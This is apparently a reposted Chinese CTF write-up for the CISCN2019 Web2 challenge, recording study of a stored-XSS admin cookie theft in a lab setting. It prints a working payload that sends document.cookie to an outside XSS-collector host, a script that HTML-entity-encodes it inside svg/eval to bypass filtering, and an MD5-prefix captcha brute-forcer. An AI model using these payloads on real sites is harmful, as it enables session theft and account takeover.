[CISCN2019 華東北賽區]Web2刷題筆記
阿新 • • 發佈:2022-02-05
無摘要
最近的學習時間大部分用在了新東西上面,只靠刷刷freebuf偶爾刷道ctf題來溫一溫之前的方向了
題目登陸註冊後可以發表投稿和反饋,提供了xss平臺
存在admin.php頁面需要身份認證才能訪問
思路:投稿帶有xss程式碼,反饋去讓管理員訪問,打到管理員cookie進入admin.php
xss平臺原始碼
(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})(); if('1'==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&id=hPpiFj&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
將(new Image()).src改為window.location.href,把新建影象的函式改為直接跳轉
直接交平臺給出來的會被過濾,用html編碼進行繞過,利用svg標籤,eval執行程式碼
html編碼並生成payload指令碼
words="(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();" re="" for c in words: re+="&#"+str(ord(c)) print("<svg><script>eval"+re+"</script>")
提交後拿到頁面的url到反饋頁面提交
需要驗證碼md5前六位為固定值,指令碼爆破即可
import hashlib for i in range(1,10000000000): md = hashlib.md5(str(i).encode("utf-8")).hexdigest() if md[0:6]=='6a1b6f': print(i)
提交成功後拿到管理員cookie,攜帶後訪問admin.php
最簡單的聯合注入拿flag